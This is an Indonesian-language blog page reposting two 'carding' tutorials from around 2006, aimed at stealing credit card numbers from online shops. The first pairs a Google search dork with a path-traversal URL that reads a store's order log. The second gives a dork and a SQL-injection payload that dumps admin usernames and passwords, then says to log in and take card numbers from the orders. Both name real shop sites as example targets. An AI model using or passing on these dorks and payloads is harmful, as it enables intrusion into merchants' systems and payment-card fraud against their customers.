TUTORIAL CARDING

nambah – nambah berita ( BUG LAMA )

mungkin untuk om2 yang jago carding udah tahu bug yang ini, ini cuma untuk teman2

pemula aja

pertama cari di google

allinurl:/cgi-bin/store/index.cgi?page=

contoh yang didapat dari google

http://www.lilypadbulbs.com/cgi-bin/store/ index.cgi?page=Returns%20and%

20Guarantees.htm&cart_id=5745716

buka link yang ditemukan seperti diatas

kemudian ganti/isikan dibelakang = menjadi../admin/files/order.log

sehingga menjadi

http://www.lilypadbulbs.com/cgi-bin/store/ index.cgi?page=../admin/files/order.log

sekian terima kasih

Post by : d3bug on [ 26 April 2006 04:24:47 ] 203.130.206.114

tutorial carding

Tutorial Carding by god_army

Disini saya mau berbagi sedikit tentang tutorial seputar carding yang mana menggunakan script

yang mengexploitasi terhadap web yang masih vuln terhadap script yang saya buat.

Sebenarnya script itu masih bisa di modifikasi lagi yah sesuai kebutuhan aza tapi itu terserah

saudara … hehe..hehe.

Langkah yang pertama ialah mencari target web yang mau kita test vuln apa enggaxnya, kita cari

di cari di google dengan keyword :

/shop/shopdisplayproducts.asp atau

shopdisplayproducts.asp

Kalo dah dapet web yang dah mau dijadiin target terus kita coba pake script ini –> ?cat=´%

20and%201=convert(int,(select%20top%201%20fldusername%2b´/´%2bfldpassword%20from%

20tbluser))–sp_password

Misalnya kita dapet target http://www.masih-vuln.com/shopdisplayproducts.asp?weleh=uhui

Terus kita masukin deh script tadi dibelakang shopdisplayproducts.asp jadinya kayak gini deh :

http://www.masih-vuln.com/shopdisplayproducts.asp?cat=´%20and%201=convert(int,(select%20top%

201%20fldusername%2b´/´%2bfldpassword%20from%20tbluser))–sp_password

Der apa yang terjadi …? Kok gx ada yang terjadi malahan keluar

The page cannot be found

The page you are looking for might have been removed, had its name changed, or is temporarily

unavailable.

Kalo ghitu artinya tuh web gx bisa kita kasih script gituan, coba cari yang laen deh.

Kalo webnya masih vuln entar keluar username sama password adminnya, kalo udah dapet kita

tinggal login pake username and password hasil temuan kita tadi.

Sebagai contoh web yang masih vuln adalah :

http://www.ilovesport.com.au jadinya :

http://www.ilovesport.com.au/shop/shopdisplayproducts.asp?cat=´%20and%201=convert(int,

(select%20top%201%20fldusername%2b´/´%2bfldpassword%20from%20tbluser))–sp_password

Dan yang keluar malahan username sama password adminnya, abis itu kita tinggal login pake

username ama password tersebut di

http://www.ilovesport.com.au/shop/admin.asp

hehehehe … heheheheh

berhasil khan ….

abis itu masuk ke order lognya terus lo cari deh cartu creditnya disana.

hihihihhihi semoga sukses dah.

ULEAD 7

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout /  Ubah )

Foto Google+

You are commenting using your Google+ account. Logout /  Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout /  Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout /  Ubah )

Connecting to %s